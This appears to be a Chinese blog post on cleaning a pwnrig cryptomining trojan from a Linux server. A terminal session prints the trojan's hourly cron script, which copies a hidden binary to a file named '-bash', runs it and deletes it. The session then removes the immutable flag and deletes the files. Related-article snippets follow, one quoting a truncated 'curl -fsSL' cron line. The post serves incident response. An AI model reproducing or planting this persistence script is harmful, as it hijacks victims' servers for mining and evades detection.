一位置

[root@localhost info]# cd /etc/cron.hourly/
[root@localhost cron.hourly]# ls
0anacron  sync
[root@localhost cron.hourly]# more sync 
#!/bin/bash
#
#      Start/Stop the pwnrig clock daemon
#
# chkconfig 2345 90 60
# description: sync clock (GNU System)
cp -f -r -- /bin/sysdrr /usr/bin/-bash 2>/dev/null
cd /usr/bin/ 2>/dev/null
./-bash -c >/dev/null
rm -rf -- -bash 2>/dev/null

二删除:

[root@localhost cron.hourly]# lsattr sync 
----i--------------- sync
[root@localhost cron.hourly]# chattr -R -i sync 
[root@localhost cron.hourly]# rm sync 
rm: remove regular file 'sync'? y

[root@localhost cron.hourly]# chattr -R -i /bin/sysdrr
[root@localhost cron.hourly]# rm /bin/sysdrr
rm: remove regular file '/bin/sysdrr'? y
[root@localhost cron.hourly]# ls
0anacron
[root@localhost cron.hourly]# chattr -R -i /bin/sysdrr
chattr: No such file or directory while trying to stat /bin/sysdrr

挖矿木马位置
[root@localhost info]# cd /etc/cron.hourly/[root@localhos...
Linux运维之解决服务器挖矿木马问题
1 挖矿木马 1.1 定义挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他...
挖矿木马清除
cd /var/spool/cron/root 注释掉 #*/5 * * * * curl -fsSL http:...
挖矿木马清除
一.Appearance 1.1 McAfee重复删除同一个木马RDN/Autorun.worm.gen，路径：C...
Linux 常用命令
系统安全阿里云挖矿木马处理[https://blog.csdn.net/qq_26870933/article/...
WannaMine挖矿蠕虫变种攻击分析报告
近日，经纬信安“戍将”产品捕获到内网挖矿蠕虫变种攻击，分析如下：样本概述根据该样本的木马母体的传播方式以及挖矿...
服务器再次中挖矿木马
客服说用着网站操作很卡，很不幸，服务器再次中木马了，这次很暴力，CPU直接飚到200%！初步判断是挖矿木马了，这次...
对linux挖矿木马systemdMiner的一次应急分析
一、背景本次挖矿木马的应急事件，配合老师给的信息，结合动态分析、静态分析的方法，对该木马进行了深入的分析，初步...
kworkerds 挖矿木马简单分析及清理
公司之前的开发和测试环境是在腾讯云上，部分服务器中过一次挖矿木马 kworkerds，本文为我当时分析和清理木马的...
阿里云挖矿木马查找记录
阿里云服务器CPU提示占用百分百把这个三个shell脚本拿到本地后查看内容，基本内容一样。把eval换成ech...